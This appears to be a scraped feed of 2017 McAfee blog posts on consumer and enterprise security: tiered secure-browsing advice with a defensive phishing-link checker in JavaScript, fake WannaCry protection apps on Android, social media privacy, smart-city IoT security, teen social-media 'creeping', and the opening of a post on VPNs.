With so many threats looming, it’s tempting to take the strictest approach by locking everything down, but the challenge is to balance precautions in a way that keeps you productive. For example, to avoid malicious JavaScript, you could just turn off JavaScript in your browser preferences – except half the Internet would become nearly impossible to use. Have you tried using Gmail without JavaScript turned on? It isn’t pleasant.

We all use the web differently, and our risks vary drastically, depending on where we are, what we are doing, even what day it is. How security researchers stay safe online is dramatically different from a consumer who emails, uses Facebook, and watches Netflix. That in turn is different from a developer downloading new tools and frequenting forums for advice.

At a base level, you should regularly update all your applications – not just the OS, but every application, especially your web browser. You should also switch your browser preferences to click-to-play for Flash if your browser hasn’t proactively done that for you. You should also deactivate ActiveX and uninstall the Java client on your machine. Unless you are using Java-hungry client applications, such as games or certain educational offerings, you likely don’t need Java anymore. Even major videoconferencing applications are shifting to pure HTML5.

You should also consider the combination of venue and activity. For example, performing sensitive transactions on public wireless networks can get you in trouble. The public Wi-Fi at your favorite coffee shop is not the place for online banking. HTTPS protects the connection only as long as you never click through a certificate warning; on a hostile network, bogus captive portals and SSL-stripping attacks that quietly keep you on plain HTTP are realistic.

Once you’ve got those basics down, you’ll need to consider what dangers you are most worried about, what assets you want to protect, who you interact with regularly, and where your data is stored. In the following sections, we break down these concerns to help you match your secure browsing practices to your threat tolerance – the level of threat you’re willing to live with online.

Threat level 1: No malware, please

Most folks, especially businesses, want to avoid malware at all costs. Two of the most common vectors are links that download malware and drive-by-downloads, in which malware is downloaded automatically just by loading a web page. Dangerous links can be found on webpages, in email, or on IM. Scammers often use social networks and URL shorteners to spread malicious links in disguise, in hopes that someone will click.

First action: Stop clicking on links. This requires social training, and it can be hard to stick to, especially given all the links we are sent all the time both professionally and personally. Ask people you communicate with regularly to send you a heads-up notification if they are planning to send a link – and to send the link only after getting positive confirmation. Or, ask people to confirm that they in fact sent the link by using a different channel. For example, text your brother to ask if the link sent from his account is really from him. This may sound paranoid, but the recent fake Google Docs scam succeeded because people thought the malicious file was from someone they trusted. Always type in your own links, and if someone sends you a link to what looks like a cool whitepaper, go to the source directly and seek out the whitepaper on the website yourself.

Pro tip: Set your browser to ask where a document should be saved so that you are always aware when something is being downloaded. Drive-by-downloads rely on stealth so that users don’t even realize what is happening. Configure your security software to scan all files as they are downloaded.

Threat level 2: I don’t like spyware, either

An attacker who manages to compromise your browser can uncover all kinds of information. Here, browser add-ons are not necessarily your friend. Use them sparingly, as they can become an unforeseen delivery mechanism for malware. Periodically check your list of extensions (chrome://extensions in Chrome, about:addons in Firefox) to see whether anything unfamiliar or inexplicable is there. You can rarely go wrong by disabling something that looks suspicious. Also be mindful of web pages that try to trick you into installing browser extensions – for example, “Click ‘add’ to speed up this website” or some other deceptive prompt.

First action: Be extra cautious with browser add-ons created by individuals: many request permission to read and change data on every site you visit, and some talk to their own servers without HTTPS. Even the pros struggle: LastPass, creator of the widely used password manager, has had to fix a number of serious vulnerabilities in its browser extension recently. Ask yourself whether the convenience provided by an add-on outweighs the potential risk, especially if it's something you may not find worthwhile in a month.

Pro tip: Always consider the source. If you need to download Flash or Adobe Reader, get it from Adobe’s website. Don’t download tools like these from unaffiliated websites, because it’s easy for spyware, adware, and other malicious files to piggyback onto the download. Don’t search for “free PDF converter” and download whatever comes up first. (Do you even need one? Chrome automatically turns pages into PDF, and Office has good PDF support nowadays.) Projects like PortableApps.com and Ninite provide convenient ways to automatically obtain and update common open source and free-to-use applications from trusted sources.

Threat level 3: No tracking at any time

It’s happened to all of us: After browsing for floor tiles on HomeDepot.com, ads for home improvement pop up everywhere on the internet. Advertisers rely on cookies to follow you online and serve up ads based on your activity. But it’s not just advertising. Websites use cookies to remember your accounts, passwords, and browsing history, and to track your activity on their site. When you disable and clear cookies you cut down on the personal data cybercriminals can obtain.

First action: Use private browsing or incognito mode when online. Here, cookies and browsing history aren't retained when your session ends. You can fire up incognito mode, paste in a URL (one you are sure isn't going to serve malware) and navigate to the page knowing nothing will be kept. If you want to always be incognito in Chrome, add --incognito at the end of the target command in the Chrome shortcut's properties, and you'll be in incognito mode whenever you launch Chrome. In Firefox, set browser.privatebrowsing.autostart to true in about:config for the same effect.

Pro tip: If you want to use Facebook, Twitter, or other social account but don’t want that login following you persistently, create a separate user profile in Chrome, Firefox, or Safari, one reserved exclusively for that social network. Log into it there, and only there, and use it there and only there. This confines the amount of data associated with that login to only those things you absolutely need it for. This technique is also useful for minimizing tracking from sites that use social networks as single-sign-on providers, like Spotify.

If you are concerned about tracking, you should enable Do Not Track on every browser you use. DNT isn’t enforced – it just tells websites that you’ve asked not to be tracked. It’s up to the websites you visit to respect that request. Many websites aren’t scrupulous and there is no guarantee the site you are visiting will honor the request, but it doesn’t hurt to at least make your preferences clear upfront.

Threat level 4: Hands off my information

Cookies are prime targets for cybercriminals because of the information they contain, especially those holding email addresses, account names, passwords, or session identifiers. Even when obscured, this information can be used nefariously. Cross-site scripting attacks inject JavaScript into a web page to read session identifiers from cookies (unless the cookie is marked HttpOnly) and impersonate the user, and cross-site request forgery attacks abuse the fact that the browser attaches session cookies automatically in order to forge requests to other sites.

First action: Block cookies whenever you can. While it would be nice to block both first-party and third-party cookies, and to disable session cookies, it makes basic web browsing such as email and social networking nearly impossible. You should at least block third-party cookies, and you should consider deleting your browser history on a regular basis.

Also, don’t let browsers store passwords. It’s convenient, but it’s hard to guarantee the security of the stored passwords. Use a separate password manager such as 1Password or KeePass.

Pro tip: For searches, use a secure search engine such as DuckDuckGo, which doesn’t store information automatically transmitted by the computer, such as your IP address and other pieces of digital identity. DuckDuckGo cannot auto-complete search queries based on previous searches or location, but that’s a small price to pay given that it also cannot link search history to you.

If you want to keep your information to yourself, private browsing is your friend. If no cookies are saved, there’s nothing to steal. It’s a good idea to delete all cookies after every browser session. You will have to log in to websites with each new session because they won’t know who you are. This is another use case for establishing distinct user sessions, in which you create sessions for specific logins and confine cookies for that login to that user session only.

While some add-ons can be dangerous, others are good – for example, Disconnect, which blocks third-party tracking cookies. The extension blocks social media accounts from tracking browsing history and gives users the ability to control the scripts on the site. Another extension worth having, Ghostery, blocks common tracking scripts but lets you whitelist sites that depend on them if need be.

Threat level 5: Don’t phish me

Phishing sites are fraudulent websites designed to steal personal information. This isn’t limited to login credentials for email or banking sites. Phishing sites can masquerade as contests and ask for your SSN. Phishing attacks can also redirect victims to a bogus site where malicious code is downloaded and the malware collects sensitive information. We see potential phishing attacks everywhere, so our natural inclination is to not click on any links.

First action: Don’t click on links received in email or open attachments, let alone fill out sensitive information in forms that come your way. That FedEx claim form may just be a fake. Pick up the phone and call FedEx to verify what is going on. Don’t click the link in an email that looks like it’s from HR warning you about your vacation balance. Go to the HR website directly to see what is wrong. Typing out URLs helps catch tricks such as using a 0 (zero) instead of an O (the letter) or nn instead of m, or the fact that the address is something like paypal.com.someothersite.com. Type a trusted URL for a company’s site into the address bar of your browser to bypass links in an email or instant message.
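As an added example that is not part of the article, the following check does mechanically what the paragraph asks the reader to do by eye: it parses a link, extracts the real host name, and flags the tricks mentioned (a trusted brand used as a subdomain of another site, and digit or letter-pair look-alikes). The expected-domain parameter, the look-alike table and the sample URLs are assumptions; a real filter would use a public-suffix list to find the registrable domain.

```javascript
// Added example (not from the article): classify a link against the domain the reader
// expects, the way a mail filter or a careful reader would. Assumes the expected
// registrable domain is supplied (e.g. "paypal.com"); the confusable table is a small
// heuristic, not a complete homoglyph list.

const CONFUSABLES = { "0": "o", "1": "l", "rn": "m", "vv": "w" };

// Fold common look-alike substitutions so "paypa1.com" and "arnazon.com" compare
// equal to the brands they imitate.
function foldConfusables(host) {
  let out = host.toLowerCase();
  for (const [fake, real] of Object.entries(CONFUSABLES)) out = out.split(fake).join(real);
  return out;
}

// Returns { verdict, host } for a link checked against expectedDomain.
function classifyLink(href, expectedDomain) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return { verdict: "unparseable", host: null };
  }
  const host = url.hostname.toLowerCase();
  const expected = expectedDomain.toLowerCase();

  // Genuine: the host is the expected domain or a subdomain of it.
  if (host === expected || host.endsWith("." + expected)) {
    return { verdict: url.protocol === "https:" ? "ok" : "ok-but-plain-http", host };
  }
  // "paypal.com.someothersite.com": the trusted name appears as a subdomain label,
  // but the registrable domain (the rightmost part) belongs to someone else.
  if (host.startsWith(expected + ".") || host.includes("." + expected + ".")) {
    return { verdict: "brand-as-subdomain", host };
  }
  // Digit/letter-pair substitutions: 0 for o, 1 for l, rn for m, vv for w.
  const folded = foldConfusables(host);
  if (folded === expected || folded.endsWith("." + expected)) {
    return { verdict: "lookalike", host };
  }
  return { verdict: "unrelated", host };
}

// Constructed sample links for a reader who expects mail from paypal.com.
const SAMPLE_LINKS = [
  "https://www.paypal.com/login",
  "http://paypal.com.someothersite.com/login",
  "https://www.paypa1.com/login",
  "https://example.org/whitepaper.pdf",
];

function classifyAll(links, expectedDomain) {
  return links.map(href => ({ href, ...classifyLink(href, expectedDomain) }));
}
```

classifyAll(SAMPLE_LINKS, "paypal.com") marks the first link ok, the second brand-as-subdomain, the third lookalike and the fourth unrelated; only the first deserves a click, and even then typing the address yourself remains the safer habit the paragraph recommends.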

Pro tip: Provide personal information only on sites that use HTTPS. Remember that with Let's Encrypt and other sources of free certificates, a padlock icon alone no longer tells you who you are talking to. Look for an EV certificate, where the name of the entity shows up in the browser bar. The HTTPS Everywhere extension from the Electronic Frontier Foundation is also a good option, as it rewrites requests to HTTPS for the sites in its ruleset.

If you receive emails from merchants – for instance, for specials or discounts – see if there’s an option to send emails as text instead of HTML. This makes it easier to see what the content of a given link is.

It’s difficult to detect all phishing attempts – some are extremely good. Make sure you don’t use the same password for your accounts so that a stolen one doesn’t mean all others are compromised. Use a password manager to generate discrete passwords for each site account. Try to keep personal Internet separate from work Internet, and never register for sites using your work address. If that account gets compromised, you don’t want it to lead to phishing attacks against your work address. Turn on two-factor authentication, when a site supports it, to make it harder for attackers to use stolen credentials – especially if that site is a financial institution.

Threat level 6: Nuclear protection

If you’re going for maximum protection, you’ll need to set up a system of multiple browsers and operating systems to keep activities separate. And you might want to consider a series of virtual machines to isolate the threats.

First action: Use different web browsers for different activities: Have a browser for financial transactions, another for communications, another for just browsing. That way, if an attacker compromises a web forum you frequent, he or she can’t use cross-site scripting to get access to online banking because the attack can’t jump across browsers. A Facebook scam can’t escape to gain access to Amazon.

For a very sensitive website – the crown jewel of your accounts – have a dedicated web browser for that site and be restrictive in its configurations. For example, having a dedicated browser used only to access your Amazon Web Services control panel means there is no way to “accidentally” browse to some other site (whitelist only AWS, block others) and potentially expose your organization’s entire cloud infrastructure. Turn on all security options to lock down the browser.

Pro Tip: For extremely risky – potentially dangerous – or incredibly sensitive sites, consider splitting up the activity across multiple virtual machines. Do all your banking in a dedicated virtual machine using a locked-down (yet up-to-date) browser. This eliminates all banking-focused web attacks, and the attacker would have to do a lot more work to get your banking information.

Linux Live CDs are a great alternative to running VMs, and you can even run a Live CD inside a VM for maximum isolation. Tails is a very stripped-down Linux variant that runs off a USB drive and can be used to hide digital footprints, since it keeps nothing persistent between sessions.

Got an email attachment that looks hinky? Open it in a VM. If it’s malware, it has infected just an empty VM. Of course, don’t assume that everything is okay just because nothing happens in the VM: Malware can be designed to not execute within a VM. Keep that file always in the VM and away from your main desktop.

If you want to hide your activities online, consider Tor, which conceals your identity by using encryption to scramble data transmissions and routes traffic between multiple Tor nodes to obscure the origin. Since your traffic passes through random servers with Tor, the data is no longer tied to your personal IP address.

Use NoScript to disable Java, JavaScript, Flash, and other dynamic content. This option will break a lot of websites, but it lets you authorize content manually, so it requires careful attention to ensure malicious code doesn’t get approved by accident. Adblock Plus blocks pop-ups and other content from known advertising and spyware sites. There are concerns with how Adblock Plus creates blocklists, because advertisers can pay to be whitelisted on the platform, but it gets the job done if the goal is to shut down pop-up ads and block potential attacks.

An alternative is to disable JavaScript and block pop-ups from the browser itself. Most browsers automatically block pop-ups by default, but JavaScript is enabled by default, again because it’s so widely used.

Keep safe

Being safe online is a combination of technology, awareness, and willingness to jump through hoops. Today’s browsers offer lots of protections, including the ability to disable plugins and turn on anti-phishing mechanisms. Just turning those on and completing basic security hygiene, such as updating all software, will address much of the low-hanging fruit.

But it is easier than ever to be infected with malware or get hit by a phishing attack. Sometimes it’s just a matter of being in the wrong place at the wrong time. But once you know what you are most worried about and what your appetite for risk is, you can set a sensible security regimen to fit your needs, keeping you safe and productive online.

 

This article was written by Fahmida Y. Rashid, Serdar Yegulalp from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.


]]>
For Three Years Running, McAfee Advanced Threat Defense Places in Radicati's Top Players Quadrant for APT Protection https://securingtomorrow.mcafee.com/business/optimize-operations/three-years-running-mcafee-advanced-threat-defense-places-radicatis-top-players-quadrant-apt-protection/ Wed, 24 May 2017 17:28:00 +0000

The post For Three Years Running, McAfee Advanced Threat Defense Places in Radicati’s Top Players Quadrant for APT Protection appeared first on McAfee Blogs.

]]>
In this year’s Radicati APT Protection—Market Quadrant, McAfee Advanced Threat Defense attained a position in the Top Players quadrant for the third year running.

The Radicati report assesses advanced persistent threat (APT) solutions from major security vendors and places them in its quadrant based on the depth and breadth of product functionality and strategic vision. Top Players are typically market leaders that shape the industry through their technology innovations and understanding of market forces.

In the APT area, vendors are evaluated on multiple parameters. Some of these are: deployment options, malware detection methods, firewall and URL filtering for attack behavior analysis, web and email security, analysis of zero-day and advanced threats, sandboxing and quarantining, data loss prevention, administration, real-time updates, remediation, environment threat analysis, and more.

McAfee Advanced Threat Defense landed its position in the Radicati quadrant because of its ability to detect complex, sophisticated threats and to connect with other security components and turn threat information into action and protection.

Here are the key areas of strength emphasized by Radicati:

  • Deployment flexibility—appliances, virtual appliances, and cloud form factors—with CapEx and OpEx purchase options.
  • The powerful, layered detection approach combines in-depth static code and dynamic analysis. Proprietary static code analysis does a thorough job unpacking and unencrypting samples to expose executables in order to examine anomalies. Dynamic analysis uses sandboxing to look at malware behavior.
  • Reporting and outputs, including the ability to share indicators of compromise (IoCs) for targeted investigations.
  • The overall breadth of protection provided by the McAfee product portfolio—from endpoints to desktops to servers.
  • Additional detection engines, such as signatures, reputation, and real-time emulation, that accelerate analysis.
  • The centralized analysis device acts as a shared resource among multiple Intel Security devices.
  • Tight integration with all McAfee solutions and third-party partner products, whether directly or through the McAfee Data Exchange Layer communications fabric. This enables real-time information sharing across the entire security ecosystem when attacks and malware are detected.
  • DLP technology applied in-line to traffic through integration with McAfee Web Gateway.

Download your copy of the Radicati APT Protection—Market Quadrant 2017.

For information on how McAfee Advanced Threat Defense can detect and protect your enterprise from stealthy malware and zero-day threats, visit our website.


Protecting Your Privacy on Social Media https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/protecting-privacy-social-media/ Wed, 24 May 2017 17:20:06 +0000

The post Protecting Your Privacy on Social Media appeared first on McAfee Blogs.

Social media sites are made for sharing, so protecting your privacy sometimes comes as an afterthought. But, the kind of information you share and whom you share it with can make a big difference between having a positive experience on social media, and putting your money and private details at risk.

Sites like Facebook and Twitter, and social apps like Instagram, have not only become a part of our everyday lives, they have also become a popular place for hackers and scammers to create fake accounts and look for victims. They use social media sites to spread dangerous links that lead to malware, or phishing attempts. They may also impersonate people you know to request money or valuable information, or even gather your own private details to steal your identity. That’s why securing your social media accounts is so important.

Here are a few tips for protecting your privacy on some of the biggest social networks.

Facebook

The social media giant has recently put more effort into helping users secure their accounts. Its Privacy Checkup tool lets you review and adjust your privacy settings to control who sees your posts, what you share, and how your profile looks to other people, among other options.

Facebook occasionally prompts you to go through a Privacy Checkup, but you can do it manually at any time. Consider selecting the strictest privacy settings, including blocking messages from strangers and restricting your profile so that only friends can see your posts and tag you.

You’ll also want to take advantage of Facebook’s extra security features, such as two-factor authentication. With it enabled, the site verifies that it is really you logging in by taking a second step, such as sending a text message with a code that you enter at login.

To adjust your settings, click on the lock icon at the top of any Facebook page and select “Privacy Checkup.”

Twitter

Twitter is a bit more open than Facebook, since it allows anyone to follow you (although you can block a follower later if you choose). You can improve your privacy by being careful about the information that you share. Keep personal information out of your profile and consider selecting the “Protect My Tweets” option, which makes your tweets visible only to followers you approve, rather than to the public.

Once again, make sure that no one else takes over your account by enabling two-factor authentication. You can also require additional verification whenever a password reset is attempted.

These settings and more can be found by clicking on the gear icon in Twitter’s upper right-hand corner.

LinkedIn

Since this is a professional networking site, people are generally more cautious about posting information about their private lives, but it’s still worth taking some time to make sure that your profile is secure. By default, anyone can see your education, photo, work experience and other details. You will want to change the settings to make sure that your profile is only visible to people you accept into your network. You can also restrict access to “connections only” when it comes to viewing your activity feed.

LinkedIn can be linked to Twitter and other authorized applications, so check that your information isn’t being shared with other platforms without your knowledge. Only allow access to applications that you trust and actually use.

You can manage these settings by clicking on the “me” icon at the top of your LinkedIn homepage, and then selecting “Privacy & Settings.”

No matter which social networking sites you use, it’s important to find a balance between sharing and engaging with others and making sure that your privacy is protected.

Here are some tips to help protect you on all social networks:

  • Be careful about how much personal information you share in the first place. Avoid posting your home address, full birth date and employer information, and don’t announce your exact location while you are still there.
  • Check your privacy settings regularly, as they often change.
  • Choose strong, unique passwords for all your accounts and take advantage of two-factor authentication.
  • Disable the sharing of location information.
  • Be wary of messages and friend requests from strangers. Never click on a link sent by someone you don’t know.
  • Block people and applications you don’t trust.
  • Think twice before taking online quizzes and surveys that ask for personal information.
  • If you no longer use a social media account, delete your information and deactivate your account.
  • Always use comprehensive security software to protect you from viruses, malware and other online threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

Fake WannaCry Protection Apps Hit the Google Play Store https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-wannacry-protection-apps-hit-google-play-store/ Wed, 24 May 2017 16:49:21 +0000

The post Fake WannaCry Protection Apps Hit the Google Play Store appeared first on McAfee Blogs.

WannaCry was the ransomware attack heard around the world. It impacted more than 150 countries and infected over 250,000 devices running Windows. It didn’t, however, affect devices running Android. But that’s not what some app developers want you to believe, as rogue WannaCry ‘protectors’ have begun to offer protection apps on Google Play for Android users.

First off, let’s make it clear that Android devices cannot be affected by WannaCry. This malware simply cannot harm these mobile devices. However, that hasn’t stopped some developers from taking advantage of the widespread concern and confusion to create fake apps that promise to protect Android devices from this global cyberattack.

When searching for WannaCry on Google Play, multiple new apps appear. Most of these are guides, web views, images, or text reminding us to patch Windows, as well as jokes and wallpapers. However, a few apps claim to “protect” Android devices against this threat, which, need I remind you, takes advantage of a Windows vulnerability.

One example is the “WannaCry Ransomware Protection Antivirus” offering, which the McAfee team looked into and found provides no value: it offers fake features and tricks unwary users into downloading an app loaded with ads, some of which encourage you to install more sponsored apps.

Not to mention, the only working “feature” in WannaCry Ransomware Protection is a repackaged scanner that does nothing more than detect the presence of a few ad libraries, which makes it clear the developers put little time into the app.

And though the McAfee team didn’t find any malware in these apps offering fake protection against WannaCry, it’s important to note that cybercriminals often seize the opportunity of trending topics like this—as we have seen with Flash Player for Android, Pokémon Go, Mario Run, Minecraft, etc.—to distribute malware on official apps markets. So, to make sure you stay safe in the face of fake apps, follow these tips:

-Be careful what you download. Don’t download anything for WannaCry protection unless it’s from a trusted security provider. More importantly, if the issue does not affect your type of operating system, don’t download anything you don’t need to.

-Read app reviews. Before you even download an app, make sure you head to the review section of an app store first. Take the time to read the reviews, and keep an eye out for ones that mention that the app is falsely advertised, or has had issues with security. When in doubt, avoid any app that seems remotely fishy.

-Use a comprehensive security solution. Whether the newest cyberattack is after your computer or your mobile devices, make sure you cover all of them with a comprehensive security solution, like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Fake WannaCry ‘Protectors’ Emerge on Google Play https://securingtomorrow.mcafee.com/mcafee-labs/fake-wannacry-protectors-emerge-google-play/ Tue, 23 May 2017 23:00:28 +0000

The post Fake WannaCry ‘Protectors’ Emerge on Google Play appeared first on McAfee Blogs.

Are Android devices affected by the self-propagating ransomware WannaCry? No—because this threat exploits a vulnerability in Microsoft Windows. This malware cannot harm mobile systems. Nonetheless, some developers are taking advantage of the uproar and possible confusion to promote apps that promise to protect Android devices.

While searching for “WannaCry” on GooglePlay we found several new apps. Most are guides—web views, images, or text reminding us to patch Windows, as well as jokes and wallpapers. However, a few apps claim to “protect” Android devices against this Windows-only threat.

One case is the package wannacry.ransomware.protection.antivirus, which we classified as a potentially unwanted program because we see no value in an app that offers fake features and tricks unwary users into downloading an app loaded with ads.

Once the program executes, it displays ads and asks you to install more sponsored apps.

All the “features” offered by WannaCry Ransomware Protection are fake; the only working function in the app is a repacked scanner that detects the presence of a few ad libraries. Despite the warning message it displays, it is clear the developers put little time into this development. The app even rates itself Medium Risk (SHA256 hash f9dabc8edee3ce16d5688757ae18e44bafe6de5368a82032a416c8c866686897).

On Google Play we observed another fake security solution offering similar fraudulent features: com.neufapps.antiviruswannacry.

Some of these apps even have very good reviews, which tells us something about the value of online reviews.

We did not find any malware in these apps offering fake protection against WannaCry, but cybercriminals often seize the opportunity of trending topics like this—as we have seen with Flash Player for Android, Pokémon Go, Mario Run, Minecraft, etc.—to distribute malicious payloads even on official apps markets.

The McAfee Labs Mobile Malware Research team has contacted Google about removing these apps. Meanwhile users must remain aware of these kinds of fake solutions that only increase your risk.

 

How ‘smart cities’ push IoT cybersecurity for state and local IT https://securingtomorrow.mcafee.com/business/optimize-operations/how-smart-cities-push-iot-cybersecurity-for-state-and-local-it/ Tue, 23 May 2017 21:53:28 +0000

The post How ‘smart cities’ push IoT cybersecurity for state and local IT appeared first on McAfee Blogs.

In the last installment of this column, we talked about cyber hygiene as a way to reduce security vulnerability. Now let’s turn our focus to cybersecurity, particularly as government gears up for the coming rush of the internet of things (IoT).

The threat recently became more real for state and local leaders. This past April, the emergency alert system in Dallas was hacked: starting just before midnight, all 156 of the city’s outdoor warning sirens were set off at once, some 15 times over nearly two hours.

For that and other reasons, the state and local governments are becoming more proactive in their approach to IT and cybersecurity, together spending more than the federal government. According to the research company e.Republic, state and local governments will spend some $101.3 billion on IT, with both counties and states each increasing their budget by about 1.5 percent. (By comparison, the federal government has budgeted about $90 billion.)

So cybersecurity is a top IT priority among CIOs at the state, county and city level. In general we can say that the priority has been triggered by a push toward IoT in the so-called “smart cities” development vision to integrate IoT with communications technology to better manage municipal assets.

To that extent, IoT is at a much more mature place at the state and local level than it is in the federal government or even private industry. State IT executives are more aware of IoT cybersecurity implications, because they’re dealing with industrial systems, facilities HVAC, appliances and the power grid, all of which are managed at the municipal level. To complicate matters, many connected municipal services, from public transportation to water purification are both used and in some cases managed by private companies, so potential cybersecurity threats can come from many different intrusion points at once.

The risk and expense are high. At a recent seminar by the Center for Digital Government, Oakland County CIO Phil Berolini noted that the cost of a breach can be as much as $240 per record. Multiply that by the number of records exposed in a typical breach, and the costs mount rapidly. LA County recently dealt with a 750,000-record breach, Berolini noted.

James Collins, Delaware’s CIO, explained that these actual and potential threats have put cybersecurity on legislative and executive radars. Because cyber is no longer relegated to being an “IT thing,” it actually opens the door for more practical solutions, Collins said.

Across the board, the real door opener for these and other CIOs is any discussion with the IT community on “baking in” cybersecurity into technology solutions. When cybersecurity maintenance costs are rolled into the tools that are actually included in IT budgeting, there’s more bang for the buck on infrastructure spending, with a higher level of security resilience. Because state and local IT leaders are still getting their arms around on-premise and off-premise cybersecurity, baked in defensive tools are especially valuable in IT purchases.

Some advice for the IT vendor community: slow down

The accelerated interest in IoT in state and local government has led to something of a gold rush among technology companies, who are often guilty of prospecting in that market in all the wrong ways. Many times overzealous technology salespeople make calls without enough research, or promise things that are of no importance.

Wanda Gibson, CTO for Fairfax County, urged the vendor community to pay better attention to published information regarding government IT priorities and budget. “Do your research,” she said, and talk to the other county departments to know what matters most.

The all-too-common sales strategy of blanket emails requesting a first meeting out of the blue is just plain “creepy” for Travis County CIO Tanya Acevedo. Calls like that do nothing to help Acevedo sell technology up the ladder in the county. A softer approach is better, with roundtables or symposiums providing good information without feeling like salespeople are shooting fish in a barrel.

The slow, measured approach seems to be the right way to get traction in the state and local technology community. As Oakland’s Berolini explains, leading with the gold-plated solution is a “turn-off” for any future discussions. Berolini, like most IT leaders, advocates a consultative approach where vendors work to understand problems, rather than trying to force fit a solution blindly.

It’s a balancing act, clearly, between government leaders working to implement IoT technology to better serve citizens quickly while ensuring that this rapid pace doesn’t introduce more security problems than it’s worth. While the vendor community is a valuable resource to address potential problems, they’re doing no one any favors by pushing their way into the process. CIOs have enough on their hands without having to fend off the advances of an under-informed partner.

With enough shared background and experience, the IoT phenomenon will take off for state and local government – and will provide valuable insight all the way up to the federal level.

 

This article was written by Lloyd McCoy Jr. From CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

6 Ways to ‘Just Say No’ to the Time Wasting Habit of Digital Digging https://securingtomorrow.mcafee.com/consumer/family-safety/6-ways-just-say-no-obsessive-digital-digging/ Tue, 23 May 2017 14:00:12 +0000

The post 6 Ways to ‘Just Say No’ to the Time Wasting Habit of Digital Digging appeared first on McAfee Blogs.

If an app existed that tracked the minutes we spent looking at other people’s social profiles online (much like a Fitbit that tracks physical steps), some of us might quietly slip into a state of shock.

Call it what you will — creeping, Facebook stalking, digital digging — it’s a habit that could be sucking up your time and even your life. Sometimes it’s an innocent click on Facebook to see what an old friend is up to. Only that click might lead to an interesting comment left by a mutual friend you totally forgot about, which inspires a few more clicks that might lead to several other pages and before long you are in the digital equivalent of Istanbul with no idea how you got there.

Other clicks aren’t so innocent, especially when it comes to tweens and teens. Young love has the internet buzzing with profile hopping and ex-stalking. On the agenda today: Who is dating who and who is in whose story? Who is liking a certain somebody’s photos or tweets just a little too much lately? What started as a simple look can soon turn into a full-blown ex- or friends-of-new-girl-or-guy-of-ex, obsession.

Not a great way to spend a day. And with summer coming up, digital digging is not a good way to spend a whole lot of days.

We’ve All Done It

Creeping isn’t just for kids; adults do their fair share. The more independent kids become, the less personal information they share, which prompts parents to digitally piece together their kids’ social life. On our agenda today: Who are they hanging out with? What kind of kids are they? Where did they really go on Friday night?

Yes, parents (whether they admit it or not) have also become quite adept at social creeping. For teens and adults alike, if you’ve ever dabbled in the excessive zone or watched someone else obsess, you know it can be emotionally and physically exhausting and yield zero benefits.

However, knowing that excessive digital digging is not healthy or productive rarely stops someone on the hunt. So what can you do to encourage your teenager (or even yourself) to wean off and eventually quit this counterproductive hobby? Here are a few things.

Six ways to ‘just say no’ to digital digging

1. Relationship over rules. Your first tool in equipping your child is building a good relationship. From there, just about anything on your parenting docket is possible. So, every day, in big and small ways, be sure that relationship (not controlling behavior) is your #1 parenting goal. Listen. Empathize. Be a positive advocate for your tween or teen child (as opposed to a critical, demanding authority figure). Remember: Balance is key. There will be a season to be your child’s best friend, but that’s not the goal just yet.

If you want to get a taste of how even the best-intentioned parents can distort creeping, just watch the movie Men, Women & Children, and you will be instantly inspired to keep your parental digital snooping in check. In the film, actor Jennifer Garner plays an overly-snooping mom who tragically misses the bigger picture of the importance of building a relationship with teens over enforcing digital rules.

2. Logic. This is always a great, albeit overlooked, place to start. Slow down long enough to understand exactly how unhealthy the habit is. A) Ask your child (or your friend, or yourself if applicable) how many hours a day, a week, a month, they check on “that” person’s account. Have them add it up. They may be shocked. B) Have them list anything they’ve discovered that has made them feel good about themselves or their relationship with the other person. That list will likely be short, if not empty. C) Gently ask: “To what end? What is the benefit of this? How does it make you feel?” Then be quiet and let them talk.

3. Clean house. Encourage your child to unfollow, delete phone numbers, or even block a person they are trying to break ties with. This may cause panic since in your teen’s world, doing this is akin to social exile and could extinguish (in their eyes) any hope for a future reconciliation. Start small and set a goal. Ask your child to do this for two weeks. Sometimes a few weeks can restore sleep and a whole new perspective.

4. Stay busy. If you keep touching a wound, it will never heal. And if you keep creeping, your heart will never heal. Replace digging time with another activity or two. Encourage your son or daughter to get a new hobby, try out for a new sport, or do something fun with family or friends instead of trolling the internet piecing posts together.

5. Provide accountability. A heartbroken teen won’t notice it but a parent or group of friends will. If your child begins subtweeting a lot, overposting his or her fun photos, or even serial dating in a digitally competitive way, it’s a sign that healing and creeping are at odds. Step in. Respectfully and gently redirect your teen to limit posting until his or her heart is in a healthier place.

6. Eliminate the temptation. If willpower, accountability, filtering, and logic fail, encourage (or mandate) your child to unplug for several hours a day. Turn the hours into a full day or two a week. This will likely mean you physically take their phone while they are forced to pursue other activities. Lastly, be sure to seek professional help if you see signs of internet addiction in your child or someone you know. Trust your gut; you know when a behavior has evolved into something unhealthy.

There’s not one solution that fits every situation. Creeping can be a short season, and other times, well, it can become emotionally damaging and evolve to dangerous behavior. Be flexible, try different approaches to help your child (or friend, or self) — but try. The situation will likely not remedy itself. Empathize with your child’s temptation to seek information and respect his or her healing process but keep an eye on the effect technology plays in that process.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

How Using A VPN Could Save Your Summer https://securingtomorrow.mcafee.com/consumer/mobile-security/vpn-mms-protection/ Tue, 23 May 2017 13:00:34 +0000

The post How Using A VPN Could Save Your Summer appeared first on McAfee Blogs.

As summer inches closer, I begin to daydream about all the trips I’ll get to take with my family. However, whether our days are spent on the beach or walking around cities we’ve never explored, they all start the same: long-haul flights, airports, and hotels. The Wi-Fi at the airport may claim to be secure in its network name, but public Wi-Fi networks often lack encryption, the scrambling of data that keeps what you send over the network private. Without it, anyone on the same network can intercept your traffic and pick out passwords, financial details, or identity information.

